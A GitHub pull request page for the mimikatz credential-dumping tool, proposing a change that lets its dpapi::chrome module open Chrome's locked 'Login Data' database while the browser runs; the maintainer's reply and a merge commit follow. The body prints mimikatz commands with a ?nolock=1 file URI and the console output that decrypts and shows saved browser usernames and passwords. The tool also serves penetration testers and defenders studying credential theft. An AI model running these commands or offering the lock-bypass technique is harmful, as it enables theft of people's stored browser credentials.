Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add SQLITE_OPEN_URI to dpapi_chrome to allow for lockless opening #199

Closed
wants to merge 1 commit into from
Closed

Add SQLITE_OPEN_URI to dpapi_chrome to allow for lockless opening #199

wants to merge 1 commit into from

Conversation

psychomario
Copy link

Currently, dpapi::chrome fails to run when Chrome is open due to sqlite trying to lock the database and failing. This PR enables the SQLITE_OPEN_URI flag on sqlite3_open_v2 which allows for the addition of the ?nolock=1 parameter to the database filename (when formatted as a file: uri), bypassing this restriction.

The below output shows that the old behaviour remains unchanged, but the new URI format is also supported which can bypass the lock.


  .#####.   mimikatz 2.2.0 (x64) #17763 Apr  8 2019 16:58:17
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Cam Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # dpapi::chrome /in:"C:\Users\rmcnamara\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

URL     : https://www.facebook.com/ ( https://www.facebook.com/ )
Username: testtest
 * using CryptUnprotectData API
Password: testtest

mimikatz # dpapi::chrome /in:"file:///C:/Users/rmcnamara/AppData/Local/Google/Chrome/User%20Data/Default/Login%20Data?nolock=1" /unprotect

URL     : https://www.facebook.com/ ( https://www.facebook.com/ )
Username: testtest
 * using CryptUnprotectData API
Password: testtest

Chrome Opened...

mimikatz # dpapi::chrome /in:"C:\Users\rmcnamara\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
ERROR kuhl_m_dpapi_chrome_isTableExist ; sqlite3_prepare_v2: database is locked
ERROR kuhl_m_dpapi_chrome_isTableExist ; sqlite3_prepare_v2: database is locked
ERROR kuhl_m_dpapi_chrome ; Neither the table 'logins' or the table 'cookies' exist!

mimikatz # dpapi::chrome /in:"file:///C:/Users/rmcnamara/AppData/Local/Google/Chrome/User%20Data/Default/Login%20Data?nolock=1" /unprotect

URL     : https://www.facebook.com/ ( https://www.facebook.com/ )
Username: testtest
 * using CryptUnprotectData API
Password: testtest

mimikatz #

The more 'correct' method for this is to use the lockless win32-none VFS as the fourth parameter to sqlite3_open_v2, but the bundled version of sqlite does not have this VFS included (upstream does: sqlite3.c:L46502 from sqlite-autoconf-3270200.tar.gz)

@gentilkiwi
Copy link
Owner

gentilkiwi commented Apr 11, 2019
edited
Loading

Very good PR with excellent description about what, and how to fix.
I really prefered the option to update the library to use the VFS instead URI file scheme (user will not understand how to use it...)

It was a pain to make an usable sqlite3.c version again, but thanks to it for a best mimikatz now.

Thank you again, it's not all days I've a very good description of problem!

giphys_best_gifs_of_the_year_2017_11

wzdiyb pushed a commit to wzdiyb/mimikatz that referenced this pull request Feb 16, 2020
@gentilkiwi @wzdiyb
[fix gentilkiwi#199] Allow dpapi::chrome to open DB without lock (lib…
a3a4413 
…rary update to support win32-none VFS) thank you @psychomario !

[new] net::trust adds LDAP search to get objectGuid for lsadump::dcsync usage
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@psychomario @gentilkiwi @rorymcnamara